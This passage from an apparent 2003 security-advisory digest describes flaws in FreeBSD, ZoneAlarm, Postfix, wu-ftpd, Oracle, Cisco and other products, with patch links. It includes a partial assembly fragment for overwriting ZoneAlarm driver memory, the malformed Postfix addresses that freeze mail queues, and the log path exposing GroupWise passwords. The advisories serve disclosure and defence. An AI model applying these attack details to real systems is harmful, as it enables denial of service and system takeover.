loaded it dynamically using kldload(8) or by setting `ibcs2_enable' in
rc.conf(5).

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:10/ibcs2.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:10/ibcs2.patch.asc

Cisco CSS 11000 Series DoS

2003-08-07

Risk level: medium

Type: Remote DoS

Source of info: s21sec

Impact

A heavy storm of TCP SYN packets directed to the circuit address of the 
CSS 
can cause DoS on it, high cpu load or even sudden reboots.

Overview

The issue is known by cisco as the ONDM Ping failure (CSCdz00787). On the 
CS800 chassis the
system controller module (SCM) sends ONDM (online diagnostics monitor) 
pings to each SFP card
in order to see if they are alive, if the SCM doesn't get a response in 
about 30 seconds the
SCM will reboot the CS800 and there will be no core.

By attacking the circuit IP address of the CSS with SYN packets the 
traffic is sent up to the SCM
over the internal MADLAN ethernet interface. If this internal interface 
becomes overloaded
the ONDM ping request and response traffic can be dropped leading this to 
an internal DoS
since no internal comunications are available.

Any attacker could do this externally with a few sessions of NMAP and a 
cable/ADSL internet
connection.

This vulnerability affects the models 11800, 11150 and 11050 with chassis 
CS800.

Patches

http://www.cisco.com/en/US/products/hw/contnetw/ps789/prod_release_note09186a008014ee04.html

Zone alarm device driver vulnerability

2003-08-04

Risk level: medium

Type: local system compromise

Source of info: sec-labs

Impact

 The driver installed with ZoneAlarm is vulnerable, and can be exploited  in cause of that
 attacker can gain full system control (ring0 
privileges). In the worse for attacker option, 
OS can fault.

Overview

The driver installed with ZoneAlarm is vulnerable, and can be
   exploited  in cause of that attacker can gain full system control
   (ring0 privileges).    

   By sending properly formatted message to the ZoneAlarm Device
   Driver (VSDATANT - TrueVector Device Driver) you can cause an
   device driver     memory overwrite. 
     
   Overview, sending faked buffors with specific singal can cause
   a miscellaneous code execution:

   First signal should be send to overwrite specific memory location,
   in the current case it can be one of the case-if-statement.

     push 0 					;overlapped
     push offset bytes_returned			;bytes returned
     push 4					;lpOutBuffer size
     push STATMENT_INSTRUCTION_POINTER		;memory to overwrite
     push 0					;lpInBuffer size
     push 0					;lpInBuffer
     push 8400000fh				;guess what X-D
     push vsdatant_handle			;device handle
     call DeviceIoControl			;send it!


   If the correct STATMENT_INSTRUCTION_POINTER will be put the address
   should be overwritten to 00060001h (example). After memory
   allocation     at this address (inserting shellcode bla bla bla), the
   second signal must     be send to jump into inserted code. That can
   be done with sending another     signal:


     LpInBuffer: 
     db STATMENT_OVERWRITTEN_NUMBER			;where to jump
     db 7 dup (0)					;data?
     dd temp_buff					;temp buffer
     db 10 dup (0)					;some space

   This one should be send with another dwIoControl code, however we
   are  no longer publishing any exploits, even PoC (die kiddies)

   After sending second faked message, device driver will jump 
   to the STATEMENT offset which was overwritten by first "signal"
     

Single byte buffer overflow in FreeBSD realpath(3) [previously reported as error in wu-ftpd]

2003-08-04

Risk level: high

Type: Buffer overflow

Source of info: FreeBSD Project Team

Impact

Applications using realpath(3) MAY be vulnerable to denial of service
attacks, remote code execution, and/or privilege escalation.  The
impact on an individual application is highly dependent upon the
source of the pathname passed to realpath, the position of the output
buffer on the stack, the architecture on which the application is
running, and other factors.

Overview

I.   Background

The realpath(3) function is used to determine the canonical,
absolute pathname from a given pathname which may contain extra
``/'' characters, references to ``/./'' or ``/../'', or references
to symbolic links.  The realpath(3) function is part of the FreeBSD
Standard C Library.

II.  Problem Description

An off-by-one error exists in a portion of realpath(3) that computes
the length of the resolved pathname.  As a result, if the resolved
path name is exactly 1024 characters long and contains at least
two directory separators, the buffer passed to realpath(3) will be
overwritten by a single NUL byte.

III. Impact

Applications using realpath(3) MAY be vulnerable to denial of service
attacks, remote code execution, and/or privilege escalation.  The
impact on an individual application is highly dependent upon the
source of the pathname passed to realpath, the position of the output
buffer on the stack, the architecture on which the application is
running, and other factors.

Within the FreeBSD base system, several applications use realpath(3).
Two applications which are negatively impacted are:

(1) lukemftpd(8), an alternative FTP server: realpath(3) is used to
    process the MLST and MLSD commands.  [lukemftpd(8) is not built or
    installed by default.]

(2) sftp-server(8), part of OpenSSH: realpath(3) is used to process
    chdir commands.

In both of the cases above, the realpath(3) vulnerability may be
exploitable, leading to arbitrary code execution with the privileges
of the authenticated user.  This is probably only of concern on
otherwise `closed' servers, e.g. servers without shell access.

At the time of 4.8-RELEASE, the FreeBSD Ports Collection contained
the following applications which appear to use realpath(3).  These
applications have not been audited, and may or may not be vulnerable.
There may be additional applications in the FreeBSD Ports Collection
that use realpath(3), particularly statically-linked applications and
applications added since 4.8-RELEASE.

BitchX-1.0c19_1
Mowitz-0.2.1_1
XFree86-clients-4.3.0_1
abcache-0.14
aim-1.5.234
analog-5.24,1
anjuta-1.0.1_1
aolserver-3.4.2
argus-2.0.5
arm-rtems-gdb-5.2_1
avr-gdb-5.2.1
ccache-2.1.1
cdparanoia-3.9.8_4
cfengine-1.6.3_4
cfengine2-2.0.3
cmake-1.4.7
comserv-1.4.3
criticalmass-0.97
dedit-0.6.2.3_1
drweb_postfix-4.29.10a
drweb-4.29.2
drweb_sendmail-4.29.10a
edonkey-gui-gtk-0.5.0
enca-0.10.7
epic4-1.0.1_2
evolution-1.2.2_1
exim-3.36_1
exim-4.12_5
exim-ldap-4.12_5
exim-ldap2-4.12_5
exim-mysql-4.12_5
exim-postgresql-4.12_5
fam-2.6.9_2
fastdep-0.15
feh-1.2.4_1
ferite-0.99.6
fileutils-4.1_1
finfo-0.1
firebird-1.0.2
firebird-1.0.r2
frontpage-5.0.2.2623_1
galeon-1.2.8
galeon2-1.3.2_1
gdb-5.3_20030311
gdb-5.2.1_1
gdm2-2.4.1.3
gecc-20021119
gentoo-0.11.34
gkrellmvolume-2.1.7
gltron-0.61
global-4.5.1
gnat-3.15p
gnomelibs-1.4.2_1
gprolog-1.2.16
gracula-3.0
gringotts-1.2.3
gtranslator-0.43_1
gvd-1.2.5
hercules-2.16.5
hte-0.7.0
hugs98-200211
i386-rtems-gdb-5.2_1
i960-rtems-gdb-5.2_1
installwatch-0.5.6
ivtools-1.0.6
ja-epic4-1.0.1_2
ja-gnomelibs-1.4.2_1
ja-msdosfs-20001027
ja-samba-2.2.7a.j1.1_1
kdebase-3.1_1
kdelibs-3.1
kermit-8.0.206
ko-BitchX-1.0c16_3
ko-msdosfs-20001027
leocad-0.73
libfpx-1.2.0.4_1
libgnomeui-2.2.0.1
libpdel-0.3.4
librep-0.16.1_1
linux-beonex-0.8.1
linux-divxplayer-0.2.0
linux-edonkey-gui-gtk-0.2.0.a.2002.02.22
linux-gnomelibs-1.2.8_2
linux-mozilla-1.2
linux-netscape-communicator-4.8
linux-netscape-navigator-4.8
linux-phoenix-0.3
linux_base-6.1_4
linux_base-7.1_2
lsh-1.5.1
lukemftpd-1.1_1
m68k-rtems-gdb-5.2_1
mips-rtems-gdb-5.2_1
mod_php4-4.3.1
moscow_ml-2.00_1
mozilla-1.0.2_1
mozilla-1.2.1_1,2
mozilla-1.2.1_2
mozilla-1.3b,1
mozilla-1.3b
mozilla-embedded-1.0.2_1
mozilla-embedded-1.2.1_1,2
mozilla-embedded-1.3b,1
msyslog-1.08f_1
netraider-0.0.2
openag-1.1.1_1
openssh-portable-3.5p1_1
openssh-3.5
p5-PPerl-0.23
paragui-1.0.2_2
powerpc-rtems-gdb-5.2_1
psim-freebsd-5.2.1
ptypes-1.7.4
pure-ftpd-1.0.14
qiv-1.8
readlink-20010616
reed-5.4
rox-1.3.6_1
rox-session-0.1.18_1
rpl-1.4.0
rpm-3.0.6_6
samba-2.2.8
samba-3.0a20
scrollkeeper-0.3.11_8,1
sh-rtems-gdb-5.2_1
sharity-light-1.2_1
siag-3.4.10
skipstone-0.8.3
sparc-rtems-gdb-5.2_1
squeak-2.7
squeak-3.2
swarm-2.1.1
tcl-8.2.3_2
tcl-8.3.5
tcl-8.4.1,1
tcl-thread-8.1.b1
teTeX-2.0.2_1
wine-2003.02.19
wml-2.0.8
worker-2.7.0
xbubble-0.2
xerces-c2-2.1.0_1
xerces_c-1.7.0
xnview-1.50
xscreensaver-gnome-4.08
xscreensaver-4.08
xworld-2.0
yencode-0.46_1
zh-cle_base-0.9p1
zh-tcl-8.3.0
zh-tw-BitchX-1.0c19_3
zh-ve-1.0
zh-xemacs-20.4_1

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch.asc

Posfix 1.1.12 remote DoS

2003-08-03

Risk level: high

Type: Remote DoS

Source of info: Michal Zalewski

Impact

There is a remotely exploitable denial of service vulnerability in Postfix
up to and including 1.1.12. The vulnerability does not affect the most
current version, 2.0, due to a major overhaul of the address parsing code.
Releases prior to 1.1.9 are not vulnerable by default, but will be exposed
if append_dot_mydomain is turned off in the configuration file (see
section 3 for more details).

Overview

There is a remotely exploitable denial of service vulnerability in Postfix
up to and including 1.1.12. The vulnerability does not affect the most
current version, 2.0, due to a major overhaul of the address parsing code.
Releases prior to 1.1.9 are not vulnerable by default, but will be exposed
if append_dot_mydomain is turned off in the configuration file (see
section 3 for more details).

Recent 1.1 releases, having no publicly disclosed security problems, are
still commonly used and shipped in several popular Linux distributions,
including Red Hat 9 or Debian 3.0 (woody) - those distributions both ship
1.1.11.

The vulnerability lies in the address parser code. By supplying a remote
SMTP listener with a malformed envelope address, it is possible to,
depending on the method, either:

  - Cause the queue manager, nqmgr, to lock up permanently, effectively
    stopping any queue processing - all mail traffic supressed. Restarting
    the service has no effect - a specific entry has to be removed from
    the queue to fix the problem. For that reason, a builtin watchdog
    that restarts nqmgr after a period of nonresponsive behavior, is
    not able to cause a recovery from this condition.

    The attack can be performed by forcing the service to queue a mail
    to an address that would generate a bounce - depending on the
    configuration, it can be <nonexistent@local-server-name>, or, if user
    names are being checked, <nonexistent@[127.0.0.1]>. The "mail from" or
    "Errors-To" address should be set to "<.!>" or
    "<.!@local-server-name>". An attempt to parse and rewrite the latter
    address when preparing a bounce will lock up the service.

...or...

  - Lock up a single instance of the smtp listener in a unusable state
    that persists after the client disconnects. By repeating this,
    it is possible to DoS the service (or entire system, depending
    on the configuration) in a very effective manner.

    This can be achieved by providing any valid "MAIL FROM" in a SMTP
    conversation, and then supplying a "RCPT TO" similar to "MAIL FROM"
    in the previous example. If the server is vulnerable, the session
    should freeze at this point.

The latter approach, since it only creates a single stalled process, is a
less intrusive method of testing your systems for this issue remotely.

The attack can be detected by looking for "resolve_clnt_query: null
recipient" in your maillog. It is then necessary to find the problematic
entry in the queue and remove it manually, then restart the service.

It should be noted that it is often possible to attack instances that do
not have port 25 reachable from the Internet - envelope addresses and
certain headers such as Errors-To may very well be preserved when a
message is relayed via another system or service.

Patches

ftp://ftp.cgs.pl/pub/mirror/postfix/postfix-release/official/postfix-1.1-patch13.gz

Remote user may be able to DoS a machine with netfilter connection tracking

2003-08-02

Risk level: high

Type: Remote DoS

Source of info: Netfilter Core Team

Impact

Any remote user may be able to DoS a machine with netfilter connection
  tracking when running a specific version of the Linux kernel.

Overview

The 2.4.20 kernel introduced a change in the behaviour of the generic
  linked list support.  The connection tracking core relies on the old
  behaviour to identify 'UNCONFIRMED' connections.  
  
  'UNCONFIRMED' means we've seen traffic only in one direction, but not
  in the other.  Since connection tracking was unable to identify such
  connections correctly anymore, they've been assigned a very high
  timeout.

  The patch below changes the connection tracking core to no longer rely
  on any specific behaviour of the linux linked listed API.

Patches

http://www.netfilter.org/security/2003-08-01-listadd.html
or upgrade linux kernel to >=  2.4.21

A remote user may be able to crash a machine doing Network Address Translation (NAT).

2003-08-02

Risk level: medium

Type: DoS

Source of info: Netfilter Core Team

Impact

Under limited circumstances, a remote user may be able to crash a
  machine doing Network Address Translation (NAT).

Overview

Affected systems are Linux systems with:
- kernel 2.4.20 
- recent 2.5 kernels with CONFIG_IP_NF_NAT_FTP or CONFIG_IP_NF_NAT_IRC enabled, or the ip_nat_ftp or ip_nat_irc modules loaded, on which ftp and irc users are not packet filtered out.

Solution:
 Upgrade to Linux kernels 2.4.21 (stable), or 
apply the patch. 
  As a workaround, the modules can be removed, or 
iptables can be used to block untrusted users from 
initiating ftp or irc connections through the NAT
 machine.

Patches

http://www.netfilter.org/security/2003-08-01-nat-sack.html

Novell GroupWise 6.5 Clear Text Vulnerability

2003-08-01

Risk level: medium

Type: Information leakage

Source of info: novacost

Impact

Novacoast has discovered a vulnerability in the Novell GroupWise 6.5 Wireless Webaccess logging functionality. The software exposes all username and passwords within the log file in clear text.  This information could be used to impersonate other users and allow unauthorized access to mail or network resources.

Overview

A key component of the Novell Nterprise* family of one Net solutions, Novell® GroupWise® 6.5 is a cross-platform collaboration product that enables you to work smarter alone and with others over any type of network*wired to wireless, including the Internet. In addition to integrated e-mail and scheduling services, GroupWise offers task-, contact- and document-management services that increase productivity. GroupWise also delivers secure instant messaging, tools that help you manage daily activities more efficiently and extensive mobile-access capabilities. In a nutshell, this innovative, open standards-based approach to collaboration services provides security, control and mobility while increasing user productivity and reducing the cost of managing and maintaining your organization's essential communication and collaboration services.

Affected Version:
Novell GroupWise 6.5 Webaccess
Novell GroupWise Wireless Web Access
Novell Linux/Mac Beta Client
NetWare 5/6
Apache 1.3.x

Exploit:
None required
Open sys:\apache\logs\access_log
Passwords are listed as part of the url. the are preceded with username=****&password=****

Recommended Solution:
Upgrade to Novell GroupWise 6.5 sp1

Patches

http://support.novell.com 

Wu-ftpd fb_realpath() off-by-one bug

2003-07-31

Risk level: high

Type: Buffer overflow

Source of info: iSEC

Impact

Wu-ftpd FTP server contains remotely exploitable off-by-one bug. A local
or remote attacker could exploit this vulnerability to gain root
privileges on a vulnerable system and
execute arbitrary code.

Overview

Janusz Niewiadomski and Wojciech Purczynski of iSEC Security Research have found an off-by-one bug, that exists in fb_realpath() function. An overflow occurs
when the length of a constructed path is equal to the MAXPATHLEN+1
characters while the size of the buffer is MAXPATHLEN characters only.
The overflowed buffer lies on the stack.

The bug results from misuse of rootd variable in the calculation of
length of a concatenated string:

------8<------cut-here------8<------
    /*
     * Join the two strings together, ensuring that the right thing
     * happens if the last component is empty, or the dirname is root.
     */
    if (resolved[0] == '/' && resolved[1] == '\0')
        rootd = 1;
    else
        rootd = 0;

    if (*wbuf) {
        if (strlen(resolved) + strlen(wbuf) + rootd + 1 > MAXPATHLEN) {
            errno = ENAMETOOLONG;
            goto err1;
        }
        if (rootd == 0)
            (void) strcat(resolved, "/");
        (void) strcat(resolved, wbuf);
    }
------8<------cut-here------8<------

Since the path is constructed from current working directory and a file
name specified as an parameter to various FTP commands attacker needs to
create deep directory structure.

Following FTP commands may be used to cause buffer overflow:

	STOR
	RETR
	APPE
	DELE
	MKD
	RMD
	STOU
	RNTO

This bug may be non-exploitable if size of the buffer is greater than
MAXPATHLEN characters. This may occur for example if wu-ftpd is compiled
with some versions of Linux kernel where PATH_MAX (and MAXPATHLEN 
accordingly) is defined to be exactly 4095 characters. In such cases,
the buffer is padded with an extra byte because of variable alignment 
which is a result of code optimization.

Linux 2.2.x and some early 2.4.x kernel versions defines PATH_MAX to be 
4095 characters, thus only wu-ftpd binaries compiled on 2.0.x or later 2.4.x
kernels are affected.

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/wu-ftpd-2.6.2-11.71.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.2-11.71.1.i386.rpm

Red Hat Linux 7.1 for iSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/iSeries/SRPMS/wu-ftpd-2.6.2-11.71.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/iSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm

Red Hat Linux 7.1 for pSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/pSeries/SRPMS/wu-ftpd-2.6.2-11.71.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/pSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/wu-ftpd-2.6.2-11.72.1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.2-11.72.1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/wu-ftpd-2.6.2-11.72.1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/wu-ftpd-2.6.2-11.73.1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/wu-ftpd-2.6.2-11.73.1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/wu-ftpd-2.6.2-12.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/wu-ftpd-2.6.2-12.i386.rpm

Mandrake
http://www.mandrakesecure.net/en/ftp.php

Multiple vulnerabilities in McAfee ePolicy Orchestrator 2.X and 3.0

2003-07-31

Risk level: high

Type: many types

Source of info: @stake, Inc.

Impact

Three vulnerabilities exist in the ePolicy Server and Agent
that allows an attacker to anonymously execute arbitrary code. To
attack a machine running ePO, an attacker would typically need to
be located within the corporate firewall and be able to connect over
the network to the host they wish to compromise. Once one of the
vulnerability is successfully exploited the attacker can execute
arbitrary code under the privileges used by ePO. SYSTEM is the
default. 

Overview

 McAfee Security ePolicy Orchestrator
(http://www.mcafeeb2b.com/ products/epolicy/default-desktop-
protection.asp [line wrapped]) is an enterprise antivirus management
tool.  ePolicy Orchestrator is a policy driven deployment and
reporting tool for enterprise administrators to effectivley manage
their desktop and server antivirus products. 

  The ePolicy Orchestrator (ePO) is built upon a client / server
solution with Agents running on all client hosts. This allows all
installation and administration of antivirus software to be
centralized to one host. To achive this, ePO relies on three parts:
Server, Agents and MSDE (to store configuration information). All
services are by default installed to run as SYSTEM on the host and
thus can be used to either elevate local privileges or remotely
compromise the host.

@stake has discovered 3 different vulnerabilities in the ePO
solution. 2 vulnerabilies concern the server and 1 concerns
the agent.

Server Issue #1

MSDE SA account compromise - This vulnerability applies to ePO 2.X
and 3.0 and is divided up into 3 different parts, that combined
allows an attacker to execute code on the host.

Information disclosure - By issuing a properly formatted HTTP
request to the ePO Server, it will respond with the server config
file. This config file contains username and encrypted password
for the database administrator of the MSDE installation.

Weak cryptography implementation - The encrypted password stored
in the ePO Server config file is encrypted with a DES variant and a
secret key. The secret key is stored in a dll, making decryption of
the password an easy task.

Default MSDE installation - The installation of MSDE is not
hardened, so once the attacker has the database administrator
username and password, he can execute OS commands as SYSTEM
through xp_cmdshell.

Server Issue #2

ComputerList format string vulnerability - This vulnerability
applies to ePO 2.X. Sending a POST request to the Server where the
ComputerList parameter contains a few format characters will cause
the service to crash when it tries to log a failed name resolution.
A properly constucted malicious string containing format string
characters will allow the execution of arbitrary code.

Client Issue #1

ePO Agent Heap Overflow - This vulnerability applies to ePO 2.X.
Sending a POST request to the Agent where parameters on the URL are
substituted by a large number of A's will cause the service to
crash. A properly formatted request will allow an attacker to
overwrite arbitrary data and thus execute code.

Patches

http://www.networkassociates.com/us/downloads/updates/hotfixes.asp

Buffer Overflow in Sun Solaris Runtime Linker

2003-07-29

Risk level: high

Type: Buffer overflow

Source of info: iDEFENSE Labs

Impact

A locally exploitable buffer overflow exists in the ld.so.1 dynamic runtime linker in Sun's
Solaris operating system. 
The LD_PRELOAD variable can be passed a large
 value, which will cause the runtime linker 
to overflow a stack based buffer. 
The overflow occurs on a non-executable stack
 making command execution more difficult than
normal, but not impossible. 

Overview

iDEFENSE has proof of concept exploit code allowing local attackers to
gain root privileges by exploiting the /usr/bin/passwd command on
Solaris 9. A "return to libc" method is utilized to circumvent the
safeguards of the non-executable stack. It is feasible for a local
attacker to exploit this vulnerability to gain root privileges if at
least one setuid root dynamically linked program exists on the system.
Virtually all default implementations of Solaris 8 and 9 fulfill this
criterion.

The following operating system configurations are vulnerable:

SPARC Platform
     * Solaris 2.6 with patch 107733-10 and without patch 107733-11
     * Solaris 7 with patches 106950-14 through 106950-22 and without
       patch 106950-23
     * Solaris 8 with patches 109147-07 through 109147-24 and without
       patch 109147-25
     * Solaris 9 without patch 112963-09

   x86 Platform
     * Solaris 2.6 with patch 107734-10 and without patch 107734-11
     * Solaris 7 with patches 106951-14 through 106951-22 and without
       patch 106951-23
     * Solaris 8 with patches 109148-07 through 109148-24 and without
       patch 109148-25
     * Solaris 9 without patch 113986-05

Patches

http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/55680

IRIX nsd server and modules mishandle AUTH_UNIX gid list

2003-07-29

Risk level: high

Type: remote system compromise

Source of info: SGI Security Team

Impact

It's been reported by LSD (http://www.lsd-pl.net/irx_nsd.html) that the IRIX name services daemon "nsd" can be exploited
in various ways through the AUTH_UNIX gid list.  This could result in an
attacker gaining root access.

Overview

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in future releases of IRIX.

The /usr/etc/nsd binary is installed by default on IRIX 6.5 systems as part
of eoe.sw.base.

There is no practical workaround available for these problems.  SGI
recommends either upgrading to IRIX 6.5.22 when available, or installing the
appropriate patch.

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.22 when available, or install the
appropriate patch.

   OS Version     Vulnerable?     Patch #         ----------     -----------     -------      
   IRIX 3.x        unknown                     Note 1
   IRIX 4.x        unknown                     Note 1
   IRIX 5.x        unknown                     Note 1
   IRIX 6.0.x      unknown                     Note 1
   IRIX 6.1        unknown                     Note 1
   IRIX 6.2        unknown                     Note 1
   IRIX 6.3        unknown                     Note 1
   IRIX 6.4        unknown                     Note 1
   IRIX 6.5          yes                       Notes 2 & 3
   IRIX 6.5.1        yes                       Notes 2 & 3
   IRIX 6.5.2        yes                       Notes 2 & 3
   IRIX 6.5.3        yes                       Notes 2 & 3
   IRIX 6.5.4        yes                       Notes 2 & 3
   IRIX 6.5.5        yes                       Notes 2 & 3
   IRIX 6.5.6        yes                       Notes 2 & 3
   IRIX 6.5.7        yes                       Notes 2 & 3
   IRIX 6.5.8        yes                       Notes 2 & 3
   IRIX 6.5.9        yes                       Notes 2 & 3
   IRIX 6.5.10       yes                       Notes 2 & 3
   IRIX 6.5.11       yes                       Notes 2 & 3
   IRIX 6.5.12       yes                       Notes 2 & 3
   IRIX 6.5.13       yes                       Notes 2 & 3
   IRIX 6.5.14       yes                       Notes 2 & 3
   IRIX 6.5.15       yes                       Notes 2 & 3
   IRIX 6.5.16       yes                       Notes 2 & 3
   IRIX 6.5.17m      yes            5189       Notes 2 & 4
   IRIX 6.5.17f      yes            5190       Notes 2 & 4
   IRIX 6.5.18m      yes            5191       Notes 2 & 4
   IRIX 6.5.18f      yes            5192       Notes 2 & 4
   IRIX 6.5.19m      yes            5193       Notes 2 & 4
   IRIX 6.5.19f      yes            5194       Notes 2 & 4
   IRIX 6.5.20m      yes            5195       Notes 2 & 4
   IRIX 6.5.20f      yes            5196       Notes 2 & 4
   IRIX 6.5.21m      yes            5197       Notes 2 & 4
   IRIX 6.5.21f      yes            5197       Notes 2 & 4


NOTES:

     1) This version of the IRIX operating has been retired. Upgrade to an
        actively supported IRIX operating system.  See
        http://support.sgi.com for more information.

     2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
        SGI Support Provider or URL: http://support.sgi.com

     3) Upgrade to IRIX 6.5.22 when available.

     4) Install the patch or upgrade to IRIX 6.5.22 when available.

Patches

http://www.sgi.com/support/security/
ftp://patches.sgi.com/support/free/security/patches/
http://support.sgi.com/ 
ftp://patches.sgi.com/

HTTP GET Vulnerability in Cisco AP1x00

2003-07-28

Risk level: medium

Type: DoS

Source of info: Cisco Systems

Impact

This vulnerability can cause the AP1x00 to reload. Repeated exploitation of this vulnerability can lead to a prolonged Denial-of-Service (DoS) of the AP1x00.
 A vulnerability has been reported by an external researcher in Cisco
   IOS(R) release for Cisco Aironet AP1x00 Series Wireless devices. The vulnerability affects only IOS-based Cisco Aironet Wireless products. The VxWorks based Cisco Aironet Wireless Devices are not affected.

Overview

 Sending a malformed URL to the Cisco Aironet AP1x00 can cause the device to reload.
 Repeated exploitation of this vulnerability can lead to a prolonged Denial-of-Service (DoS) of the AP1x00.
   The vulnerability is fixed in the 12.2(11)JA1 version of the software for all Cisco Aironet AP1x00 devices.
 Only the following Cisco IOS-based wireless Access Points are affected:

   +------------------------------------------+
   |   Hardware Model   | Software Release(s) |
   |--------------------+---------------------|
   |Cisco Aironet       |12.2(4)JA,           |
   |Wireless Access     |12.2(4)JA1,          |
   |Point AP1100 series |12.2(8)JA, 12.2(11)JA|
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Access     |12.2(8)JA, 12.2(11)JA|
   |Point AP1200 series |                     |
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Bridge     |12.2(11)JA           |
   |AP1400 series       |                     |
   +------------------------------------------+

   All previous VxWorks-based software releases for Cisco Aironet Access
   Point 1200 are not affected. That includes the following, and earlier,
   software releases: 11.56, 12.01T1, 12.02T1, 12.03T.

Patches

http://www.cisco.com/tacpage/sw-center/sw-wireless.shtml

Oracle Extproc Buffer Overflow

2003-07-25

Risk level: high

Type: Buffer overflow

Source of info: NGSSoftware Insight Security

Impact

Oracle's RDBMS, a leading database server package, supports stored packages
and procedures through the use of PL/SQL. These packages and procedures can
be extended by allowing calls to be made to operating system libraries. Any
library loaded in this way is done so by a process external to the main
RDBMS, namely extproc. Extproc is vulnerable to a classic stack based buffer
overflow. This can be exploited remotely by an attacker. No user ID or
password is necessary.

Overview

Description
***********
Oracle's RDBMS, a leading database server package, supports stored packages
and procedures through the use of PL/SQL. These packages and procedures can
be extended by allowing calls to be made to operating system libraries. Any
library loaded in this way is done so by a process external to the main
RDBMS, namely extproc. Extproc is vulnerable to a classic stack based buffer
overflow. This can be exploited remotely by an attacker. No user ID or
password is necessary.

Details
*******
Previously, NGSSoftware discovered a vulnerability in the Oracle package
that allowed an attacker to force extproc to load any operating system
library and execute any function. This attack did not require a user ID or
password. Oracle took steps to resolve this security hole. By way of fixing
the vulnerability, attempts to load libraries would be logged but denied
unless the call came from the local machine. Remote attempts would be logged
as just stated. However, this logging process is vulnerable to a classic
stack based buffer overflow vulnerability. By supplying an overly long
library name a stack based buffer is overflowed, overwriting the saved
return address on the stack. When the vulnerable procedure returns control
over the process' path of execution can be gained. As this does not require
a user ID or password it must be stressed that this is a critical
vulnerability. On Windows platforms Oracle typically runs in the security
context of the LOCAL SYSTEM account and, as such, allows for a complete
compromise of the server. On Unix-based systems extproc runs as the 'Oracle'
user. As the 'Oracle' user typcially is the owner of the software binaries
and data files, an attacker exploiting this can completely subvert the
integrity of the database software and data.

Fix Information
***************
NGSSoftware alerted Oracle to this vulnerability on 30th September 2002.
Oracle has reviewed the code and created a patch which is available from:

http://otn.oracle.com/deploy/security/pdf/2003alert57.pdf

NGSSoftware advise Oracle database customers to review and install the patch
as a matter of urgency.

A check for this issue already exists in NGSSQuirreL for Oracle, a
comprehensive automated vulnerability assessment tool for Oracle Database
Servers of which more information is available from the NGSSite.

http://www.nextgenss.com/products/squirrelfororacle.htm

It is further recommend that Oracle DBAs have their network/firewall
administrators ensure that the database server is protected from Internet
sourced traffic.


About NGSSoftware
*****************
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware's
sister company NGSConsulting, offers best of breed security consulting
services, specialising in application, host and network security
assessments.

Patches

http://metalink.oracle.com/

Flaw in Windows Function Could Allow Denial of Service

2003-07-23

Risk level: Moderate

Type: DoS

Source of info: Microsoft Security Team

Impact

A flaw exists in a Windows NT 4.0 Server file management function 
that can cause a denial of service vulnerability. The flaw results 
because the affected function can cause memory that it does not own 
to be freed when a specially crafted request is passed to it.

Overview

A flaw exists in a Windows NT 4.0 Server file management function 
that can cause a denial of service vulnerability. The flaw results 
because the affected function can cause memory that it does not own 
to be freed when a specially crafted request is passed to it. If 
the application making the request to the function does not carry 
out any user input validation and allows the specially crafted 
request to be passed to the function, the function may free memory 
that it does not own. As a result, the application passing the 
request could fail. 

By default, the affected function is not accessible remotely, 
however applications installed on the operating system that are 
available remotely may make use of the affected function. 
Application servers or Web servers are two such applications that 
may access the function. Note that Internet Information Server 4.0 
(IIS 4.0) does not, by default, make use of the affected function.

Mitigating Factors:<br>
- -The default installation of Windows NT 4.0 Server is not 
vulnerable to a remote denial of service. Additional software that 
makes use of the affected file management function must be 
installed on the system to expose the vulnerability remotely.<br> 
- -If the application calling the affected file management function 
carries out input validation, the specially crafted request may not 
be passed to the vulnerable function.<br> 
- -The vulnerability cannot be used to cause Windows NT 4.0 Server 
itself to fail. Only the application that makes the request may 
fail.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-029.asp
http://www.microsoft.com/security/security_bulletins/ms03-029.asp

Unchecked Buffer in DirectX Could Enable System Compromise

2003-07-23

Risk level: Critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

This vulnerability allows an attacker to execute code on a user's system. 

Overview

DirectX consists of a set of low-level Application Programming 
Interfaces (APIs) that are used by Windows programs for multimedia 
support. Within DirectX, the DirectShow technology performs client-
side audio and video sourcing, manipulation, and rendering. 

There are two buffer overruns with identical effects in the 
function used by DirectShow to check parameters in a Musical 
Instrument Digital Interface (MIDI) file. A security vulnerability 
results because it would be possible for a malicious user to 
attempt to exploit these flaws and execute code in the security 
context of the logged-on user. 

An attacker could seek to exploit this vulnerability by creating a 
